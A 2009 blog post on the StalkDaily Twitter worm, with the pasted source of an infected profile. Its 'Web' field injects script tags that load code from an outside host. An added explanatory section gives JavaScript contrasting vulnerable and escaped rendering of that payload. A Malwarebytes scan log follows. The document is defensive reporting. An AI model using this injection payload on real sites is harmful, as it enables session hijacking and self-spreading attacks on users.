
A Twitter virus shows up: StalkDaily

By CurtMonash on Sat, 04/11/09 - 5:31pm.

A Twitter virus has shown up.  Tweetstreams, including mine, send out the message:

Hey everyone, join www. StalkDaily. com. It's a site like Twitter but with pictures, videos, and so much more! :) 

(Of course, the URL link is live in the original.)

Update: Twitter now claims to have patched the hole that allowed the virus to spread. And I've posted a simpler version of the whole story.

Nobody seems to know yet exactly what is going on. http://twittercism.com/howto-remove-stalkdaily/ is getting a lot of attention with advice to stop it, but basically just says "Change your password and clear your cookies and browser cache; that should work."

Some people are assuming the virus is contracted by actually visiting the site, but I'm sure I got it WITHOUT visiting the site.

I'll try to get more information here, in the main post or comment thread, when I can.

Edit: Mark Hawker is figuring out how this works, and updating the comment thread below. He's posting more detail yet in his own Twitter stream.

Edit: @pilot suggests disabling scripts via NoScript in Firefox. But this has painful side effects.

Edit: @anowheels thinks clicking on the GangsterBoy Twitter account can cause infection -- and I did click there right before getting hit. The theory is plausible for other reasons.

Specifically, there's a profile broken in a way I haven't seen before, looking like:

View Source right now gives:

<DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="en-us" http-equiv="Content-Language" />
<meta content="Twitter is a free social messaging utility for staying connected in real-time" name="description" />
<meta content="no" http-equiv="imagetoolbar" />
<meta content="width = 780" name="viewport" />
<meta content="4FTTxY4uvo0RZTMQqIyhh18HsepyJOctQ+XTOu1zsfE=" name="verify-v1" />
<meta content="1" name="page" />
<meta content="IE=7" http-equiv="X-UA-Compatible" />
<meta content="y" name="session-loggedin" />
<meta content="11326952" name="session-userid" />
<meta content="CurtMonash" name="session-user-screen_name" />
<meta content="GangsterBoyHah" name="page-user-screen_name" />
<title>gangsterboy (GangsterBoyHah) on Twitter</title>
<link href="http://assets1.twitter.com/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://assets1.twitter.com/images/twitter_57.png" rel="apple-touch-icon" />
<script type="text/javascript">
//<![CDATA[
var page = {};
//]]>
</script>

<link href="http://assets3.twitter.com/stylesheets/screen.css?1239469830" media="screen, projection" rel="stylesheet" type="text/css" />
<link href="http://assets3.twitter.com/stylesheets/master.css?1239469826" media="screen, projection" rel="stylesheet" type="text/css" />
<style type="text/css">
/* begin custom css */
.top-navigation > li > a,
a { color: #0084B4; }
body {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
background-color: #9AE4E8;
background: #9AE4E8 url(http://static.twitter.com/images/themes/theme1/bg.gif) fixed no-repeat top left;}
#side_base {
border-left:1px solid #BDDCAD;
background-color: #DDFFCC;
width: 199px; line-height: 1.2; -moz-border-radius-topright: 5px; -webkit-border-top-right-radius: 5px; -moz-border-radius-bottomright: 5px; -webkit-border-bottom-right-radius: 5px;
}
#side div.last { border-top: 1px solid #BDDCAD; }
ul#tabMenu li {
display: block; width: 100%;
border-top: 1px solid #BDDCAD;
}
ul#tabMenu li a, #side .section h1 { color:#script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript; }
#content tr.hentry:hover a { color:#0084B4; }
body#profile #content div.hentry:hover a { color:#0084B4;}
#side .actions { border: 1px solid #BDDCAD; }
#side .promotion {
background-image:url('http://static.twitter.com/images/pale.png');
border: 1px solid #BDDCAD;
text-align: left; font-size: 11px; margin-top: 7px; padding: 6px 10px; width: 152px;
}
#side .promotion .definition span {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}
#side .promo { border: 1px solid #BDDCAD; }
#side .stats td+td {
border-left: solid 1px #BDDCAD;
border-right: solid 1px #BDDCAD;
}
#side div.section-header h1 { color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript; }
#side div.section-header h3.faq-header {
border-bottom: 1px solid #BDDCAD;
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}
#side .stat a {color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript; }



#side div.user_icon a, #side div.user_icon a:hover {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}

#side div.user_icon a:hover {
color: #0084B4;
}

#side .stats {
border-top: 1px solid #BDDCAD;
}

#side .stats a span.stats_count {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}

#side .stats a:hover span.stats_count {
color: #0084B4;
}

ul.sidebar-menu li.active a b {
border-left: 5px solid #BDDCAD;
}

ul.sidebar-menu li.active a {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}

#side hr {
background: #BDDCAD;
color: #BDDCAD;
}

#side .stats td+td {
border-left: none;
border-right: none;
}

#side div.collapsible h2.sidebar-title {
background: transparent url('http://static.twitter.com/images/toggle_up_dark.png') no-repeat center right !important;
width: 155px;
}

#side div.collapsible.collapsed h2.sidebar-title {
background: transparent url('http://static.twitter.com/images/toggle_down_dark.png') no-repeat center right !important;
}



/* end custom css */

.content-bubble-arrow { background-image: url(http://static.twitter.com/images/arr2.gif); }
.status-btn input.round-btn { background-image: url('http://static.twitter.com/images/round-btn.gif'); }
.status-btn input.round-btn:hover { background-image: url('http://static.twitter.com/images/round-btn-hover.gif'); }
.status-btn input.disabled, .status-btn input.disabled:hover { background-image: url('http://static.twitter.com/images/round-btn.gif'); }
.hentry .actions .fav { background-image: url('http://static.twitter.com/images/icon_star_full.gif'); }
.hentry .actions .non-fav { background-image: url('http://static.twitter.com/images/icon_star_empty.gif'); }
.hentry .actions .fav-throb, .hentry .actions a.del-throb { background-image: url('http://static.twitter.com/images/icon_throbber.gif'); }
.hentry .actions .del { background-image: url('http://static.twitter.com/images/icon_trash.gif'); }
body#show .reply, .hentry .actions .reply { background-image: url('http://static.twitter.com/images/icon_reply.gif'); }
.direct_message .actions .reply { background-image: url('http://static.twitter.com/images/icon_direct_reply.gif'); }
.direct_message .actions .del { background-image: url('http://static.twitter.com/images/icon_trash.gif'); }
.notify { background-image: url('http://static.twitter.com/images/girl.gif'); }
.promotion, ul#tabMenu a#keyword_search_tab.hover, ul#tabMenu a:hover { background-image: url('http://static.twitter.com/images/pale.png'); background-color: transparent; }
div#follow-toggle.closed { background-image: url('http://static.twitter.com/images/toggle_closed.gif'); }
div#follow-toggle.opened { background-image: url('http://static.twitter.com/images/toggle_opened.gif'); }
.follow-actions .following { background-image: url('http://static.twitter.com/images/checkmark.gif'); }
.loading { background-image: url('http://static.twitter.com/images/loader.gif'); }
.more { background-image: url('http://static.twitter.com/images/more.gif'); }
.more.loading { background-image: url('http://static.twitter.com/images/ajax.gif'); }
body#show .protected { background-image: url('http://static.twitter.com/images/icon_lock.gif'); }
#side .promotion { background-image: url('http://static.twitter.com/images/pale.png'); }
.rss { background-image: url('http://static.twitter.com/images/rss.gif'); }

.bulletin a.close { background: transparent url('http://static.twitter.com/images/close_small.png') no-repeat; }
ul.sidebar-menu li.active a { font-weight: bol d; color: #333; background: url('http://static.twitter.com/images/pale.png'); }
ul.sidebar-menu li:hover a { text-decoration: none; background: url('http://static.twitter.com/images/pale.png'); }
#sidebar_search_submit { background: url('http://static.twitter.com/images/nav_search_submit.png') -2px 0px !important ; }
#sidebar_search_submit:hover { background: url('http://static.twitter.com/images/nav_search_submit.png') -2px -25px !important; }
#sidebar_search_submit:active { background: url('http://static.twitter.com/images/nav_search_submit.png') -2px -50px !important; }
#sidebar_search_submit.loading, #sidebar_search_submit.loading:hover, #sidebar_search_submit.loading:active { background: #eee url('http://static.twitter.com/images/ajax.gif') no-repeat 5px 5px !important; }
#side .collapsible.loading h2.sidebar-title { background: transparent url('http://static.twitter.com/images/ajax.gif') no-repeat center right; }
#side .collapsible h2.sidebar-title {
background: transparent url('http://static.twitter.com/images/toggle_up_dark.png') no-repeat center right;
width: 155px;
}

#side .collapsible.collapsed h2.sidebar-title {
background: transparent url('http://static.twitter.com/images/toggle_down_dark.png') no-repeat center right;
}



</style>
    
</head>

<body class="account firefox-windows" id="profile">
<div id="dim-screen"></div>
<ul id="accessibility" class="offscreen">
<li><a href="#content" accesskey="0">Skip past navigation</a></li>
<li>On a mobile phone? Check out <a href="http://m.twitter.com/">m.twitter.com</a>!</li>
  <li><a href="#footer" accesskey="2">Skip to navigation</a></li>
<li><a href="#tabMenu" accesskey="3">Jump to the sidebar</a></li>
<li><a href="#signin">Skip to sign in form</a></li>
</ul>



<div id="container" class="subpage">
<span id="loader" style="display:none"><img alt="Loader" src="http://assets0.twitter.com/images/loader.gif" /></span>

<h1 id="header">
    <a href="/home" title="Twitter: home" accesskey="1" id="logo">
<img alt="Twitter.com" height="36" src="http://assets0.twitter.com/images/twitter_logo_header.png" transparent_png="true" width="155" />
</a>
</h1>






<div class="content-bubble-arrow"></div>

<table cellspacing="0" class="columns">
<tbody>
<tr>
<td id="content" class="round-left column">
                                <div class="wrapper">


<div class="profile-head">
<h2 class="thumb">
<img alt="" class="profile-img" height="73" src="https://s3.amazonaws.com/twitter_production/profile_images/133719611/940a9a0f-6c7c-11dd-8677-0519e018e1cd_bigger.jpg" width="73" /> GangsterBoyHah
</h2>
<div class="clear"></div>



<div class="protected-box">
<table><tr><td><br /><img alt="Padlock_large" src="http://assets3.twitter.com/images/padlock_large.gif" /></td>
      
<td><h1>This person has protected their updates.</h1>



<br />
<span class='sub-h1'>You need to send a request before you can start following this person.</span>
</td></tr></table>
<center>
<form action="friendships/create/30519351" method="post"><div style="margin:0;padding:0"><input name="authenticity_token" type="hidden" value="5072bac31fff2d4527bccf68cf6c48d16f1c6735" /></div> <input id="send_request" name="commit" type="submit" value="Send request" />
</form>
        </center><br />

</div>

</div>


</div>
</td>

<td id="side_base" class="column round-right">

<div id="side">

<div id="profile" class="section">
<span class="section-links">

<img src="http://assets0.twitter.com/images/icon_lock_sidebar.gif" title="This user&rsquo;s updates are protected."/>
</span>
<address>
<ul class="about vcard entry-author">
<li><span class="label">Name</span> <span class="fn">gangsterboy</span></li>
<li><span class="label">Location</span> <span class="adr">Google</span></li>
                    <li><span class="label">Web</span> <a href="http://"><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a " class="url" rel="me nofollow">http://"><script ...</a></li>

</ul>
</address>

<div class="stats">
<table>
<tr>
<td>

<a href="/GangsterBoyHah/friends" id="following_count_link" class="link-following_page" rel="me" title="See who you’re following">
<span id="following_count" class="stats_count numeric">903 </span>
<span class="label">Following</span>
</a>

</td>
<td>

<a href="/GangsterBoyHah/followers" id="follower_count_link" class="link-followers_page" rel="me" title="See who’s following you">
<span id="follower_count" class="stats_count numeric">2 </span>
<span class="label">Followers</span>
</a>

</td>
<td><a href="/GangsterBoyHah" class="link-updates" title="See all your updates" rel="me"><span id="update_count" class="stats_count numeric">126</span><span class="label">updates</span>
</a></td>
</tr>
</table>
</div>

</div>

<ul id="tabMenu">
<li>
<a href="/GangsterBoyHah" accesskey="u" id="updates_tab">Updates</a> </li>
<li>
<a href="/GangsterBoyHah/favourites" accesskey="f" id="favorites_tab">Favorites</a> </li>
</ul>



<div class="section last">
<h1>Actions</h1>
<ul>
<li>
<a href="/direct_messages/create/30519351">message</a> GangsterBoyHah
</li>


<a href="/blocks/confirm/30519351" style="color: grey;">block</a> GangsterBoyHah


</ul>
</div>

<div id="people" class="section last">
<h1>Following</h1>

<div id="following_list">

<span class="vcard">
<a href="https://twitter.com/Noword" class="url" rel="contact" title="Noword"><img alt="Noword" class="photo fn" height="24" src="https://s3.amazonaws.com/twitter_production/profile_images/54123748/pepsiman_mini.jpg" width="24" /></a>
</span>


<span class="vcard">
<a href="https://twitter.com/soychicka" class="url" rel="contact" title="soychicka"><img alt="soychicka" class="photo fn" height="24" src="https://s3.amazonaws.com/twitter_production/profile_images/111024484/blythie_mini.jpg" width="24" /></a>
</span>


<span class="vcard">
<a href="https://twitter.com/SWAGGRITE" class="url" rel="contact" title="SWAGGRITE ENT."><img alt="SWAGGRITE ENT." class="photo fn" height="24" src="https://s3.amazonaws.com/twitter_production/profile_images/131191695/Picture_025_mini.jpg" width="24" /></a>
</span>


</div>
</div>






</div>
</td>

</tr>
</tbody>
</table>



<div id="footer" class="round">
<h3 class="offscreen">Footer</h3>

<ul>
<li class="first">&copy; 2009 Twitter</li>
<li><a href="/about#about">About Us</a></li>
<li><a href="/about#contact">Contact</a></li>
<li><a href="http://blog.twitter.com">Blog</a></li>
<li><a href="http://status.twitter.com">Status</a></li>
<li><a href="/downloads">Apps</a></li>
<li><a href="http://apiwiki.twitter.com/">API</a></li>
<li><a href="http://search.twitter.com">Search</a></li>
<li><a href="http://help.twitter.com">Help</a></li>
<li><a href="/jobs">Jobs</a></li>
<li><a href="/tos">Terms</a></li>
<li><a href="/privacy">Privacy</a></li>
</ul>
</div>



<hr />

<div id="navigation">
<ul class="horizontal-nav top-nav round" style="display:inline">
<li><a href="http://twitter.com/home" accesskey="h" id="home_link">Home</a></li>
<li><a href="http://twitter.com/CurtMonash" accesskey="p" id="profile_link">Profile</a></li>
<li><a href="http://twitter.com/invitations/find_on_twitter" accesskey="=" id="find_people_link">Find People</a></li>
<li><a href="/account/settings" accesskey="s" id="settings_link">Settings</a></li>
<li><a href="http://help.twitter.com" accesskey="?" id="help_link">Help</a></li>
<li class="last">

<a id="sign_out_link" href="#" onclick="document.getElementById('sign_out_form').submit(); return false;">Sign out</a>

</li>

<form method="post" id="sign_out_form" action="/sessions/destroy" style="display:none;">
<input name="authenticity_token" value="5072bac31fff2d4527bccf68cf6c48d16f1c6735" type="hidden" />
</form>
</ul>
</div>


</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script><script src="http://assets2.twitter.com/javascripts/application.js?1239469782" type="text/javascript"></script><script src="http://assets3.twitter.com/javascripts/jquery.watermarkinput.js?1239469798" type="text/javascript"></script><script src="http://assets1.twitter.com/javascripts/notifications.js?1239469800" type="text/javascript"></script><script src="http://assets1.twitter.com/javascripts/search.js?1239469801" type="text/javascript"></script>
<script src="http://assets1.twitter.com/javascripts/jquery.cookie.js?1239469791" type="text/javascript"></script><script type="text/javascript">
//<![CDATA[
twttr.form_authenticity_token = '5072bac31fff2d4527bccf68cf6c48d16f1c6735';
if (window.top !== window.self) { setTimeout(function(){document.body.innerHTML='';},1);window.self.onload=function(evt){document.body.innerHTML='';};}
//]]>
</script><script type="text/javascript">
//<![CDATA[

$( function () {
$('body#profile ul#tabMenu li a#updates_tab, body#favourings ul#tabMenu li a#favorites_tab').isSidebarTab();

});

//]]>
</script>

    

<!-- BEGIN google analytics -->

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-30775-6");
pageTracker._setDomainName("twitter.com");
pageTracker._setVar('Logged In');
pageTracker._setVar('lang: en');
pageTracker._initData();
pageTracker._trackPageview('/profile/GangsterBoyHah');
} catch(err) { }
</script>

<!-- END google analytics -->




    <div id="notifications"></div>

</body>

</html>
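The pasted source shows two places where the attacker's profile fields reached the page, and they were handled differently. In the sidebar, the "Web" field was written straight into an href attribute, so a value beginning `http://">` closes the attribute and the anchor's start tag, and the two `<script src="http://mikeyylolz.uuuq.com/x.js">` tags that follow become live markup, loaded into whichever logged-in user views the profile (the same page carries the viewer's screen name and the form authenticity_token, so script running there acts as that user). In the custom-CSS block the same two tags appear with every character except letters, digits and spaces removed (`#script srchttpmikeyylolzuuuqcomxjsscript...`), so that field was filtered while the Web field was not. What follows is an added example, not Twitter's code: it models the two fields with the payload copied from the source above, renders each the vulnerable way and a hardened way, and ends with a small triage check that lists script hosts in a saved page source which are not the hosts this page legitimately loads from. How Twitter's templates actually built the page, and that the CSS filter was an alphanumeric strip, are assumptions inferred from the output above.

```javascript
// Added example, not Twitter's code. Models the two profile fields seen in the infected
// profile's page source: the "Web" URL field and the custom-CSS colour field. The
// template strings and the filters are assumptions made for illustration.

// Payload copied from the "Web" field of the pasted source.
const WEB_FIELD_PAYLOAD =
  'http://"><script src="http://mikeyylolz.uuuq.com/x.js"></script>' +
  '<script src="http://mikeyylolz.uuuq.com/x.js"></script>';

// The two script tags on their own, as the custom-CSS colour field would have held them.
const CSS_FIELD_PAYLOAD =
  '<script src="http://mikeyylolz.uuuq.com/x.js"></script>' +
  '<script src="http://mikeyylolz.uuuq.com/x.js"></script>';

// Vulnerable: the value is concatenated into the attribute unencoded. The first '"'
// closes href, the '>' closes the <a> start tag, and the script tags become markup.
function renderWebLinkVulnerable(url) {
  return '<a href="' + url + '" class="url" rel="me nofollow">' + url + '</a>';
}

// Hardened: encode for the HTML attribute/text context and accept only http(s) URLs,
// which also blocks javascript: and data: links that need no tag break-out at all.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function isHttpUrl(url) {
  return /^https?:\/\//i.test(url);
}

function renderWebLinkSafe(url) {
  if (!isHttpUrl(url)) return '';
  const enc = escapeHtml(url);
  return '<a href="' + enc + '" class="url" rel="me nofollow">' + enc + '</a>';
}

// Custom-CSS colour field. The value in the pasted <style> block is what the payload
// becomes when everything except letters, digits and spaces is removed (assumed filter).
// That leaves unusable CSS rather than executable markup, but it still lets arbitrary
// text into the style sheet; an allowlist of the one shape the field should hold is the
// clearer rule.
function stripToAlnum(value) {
  return value.replace(/[^A-Za-z0-9 ]/g, '');
}

function validateHexColor(value) {
  return /^[0-9A-Fa-f]{3}(?:[0-9A-Fa-f]{3})?$/.test(value) ? value : null;
}

function renderColorRule(selector, value, filter) {
  const v = filter(value);
  return v === null ? '' : selector + ' { color: #' + v + '; }';
}

// Triage helper: script hosts in a saved page source that are not the hosts this page
// legitimately loads scripts from (allowlist taken from the <script src> tags above).
const KNOWN_SCRIPT_HOSTS = /^(?:assets\d\.twitter\.com|ajax\.googleapis\.com)$/i;

function foreignScriptHosts(html) {
  const found = new Set();
  const re = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const host = m[1].replace(/^https?:\/\//i, '').split('/')[0].toLowerCase();
    if (!KNOWN_SCRIPT_HOSTS.test(host)) found.add(host);
  }
  return [...found];
}

// Constructed fragment standing in for a saved copy of the profile page: the vulnerable
// sidebar link plus one of Twitter's own script tags from the source above.
const SAMPLE_PAGE =
  renderWebLinkVulnerable(WEB_FIELD_PAYLOAD) +
  '<script src="http://assets2.twitter.com/javascripts/application.js?1239469782" type="text/javascript"></script>';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderWebLinkVulnerable(WEB_FIELD_PAYLOAD));
  console.log(renderWebLinkSafe(WEB_FIELD_PAYLOAD));
  console.log(renderColorRule('body', CSS_FIELD_PAYLOAD, stripToAlnum));
  console.log(renderColorRule('body', CSS_FIELD_PAYLOAD, validateHexColor));
  console.log(foreignScriptHosts(SAMPLE_PAGE));
}
```

Run with node to see the four renderings side by side: the vulnerable link reproduces the sidebar line from the source, the encoded link keeps the whole payload inside the attribute and text as `&lt;script ...&gt;`, the alphanumeric strip reproduces the `#script srchttp...` colour value, and the hex allowlist drops the rule entirely. The triage check reports only `mikeyylolz.uuuq.com`, which is the same thing a reader does by eye when scanning the source for script tags that do not point at Twitter's asset hosts.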

 

Edit: A Malwarebytes scan comes up with three instances of malware.  One is the Seneka rootkit (ouch!).  I don't immediately know whether all three boil down to that. The logfile is below. I've bolded selectively.

Malwarebytes' Anti-Malware 1.36
Database version: 1969
Windows 5.1.2600 Service Pack 3

4/11/2009 6:49:38 PM
Malwarebytes log mbam-log-2009-04-11 (18-49-21)

Scan type: Full Scan (C:\|D:\|)
Objects scanned: 209851
Time elapsed: 34 minute(s), 30 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 2
Registry Values Infected: 0
Registry Data Items Infected: 1
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\cs41275 (Malware.Trace) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\seneka (Rootkit.Trace) -> No action taken.

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)


Searching on Seneka rootkit turns up very different pages than searching on cs41275, so I suspect them of being two different infections.

As of this posting I haven't yet sorted out what to DO about these infections, but there's advice on the Web, especially about Seneka.

At a guess they're unrelated to StalkDaily, but I can't be sure at the moment.
